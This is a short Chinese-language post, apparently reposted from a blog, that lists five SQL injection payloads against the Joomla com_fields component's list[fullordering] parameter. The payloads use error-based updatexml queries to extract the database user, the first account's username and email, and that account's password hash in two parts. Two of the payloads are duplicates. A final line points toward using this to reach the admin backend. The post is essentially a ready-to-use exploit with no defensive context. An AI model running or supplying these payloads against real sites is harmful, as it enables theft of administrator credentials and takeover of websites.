标签:语句 view concat username from ring layout word select
注入语句如下:
payload1 = ‘/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)‘
payload2 = ‘/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select concat(username,0x3a,email) from %23__users limit 1)),1)‘
payload3 = ‘/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select left(password,30) from %23__users limit 1)),1)‘
payload4 = ‘index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select right(password,30) from %23__users limit 1)),1)‘
payload5 = ‘index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,(select right(password,30) from %23__users limit 1)),1)‘
访问后台使用firebug更改即可,记得加上用户名
标签:语句 view concat username from ring layout word select
原文地址:http://www.cnblogs.com/jwong/p/6888567.html
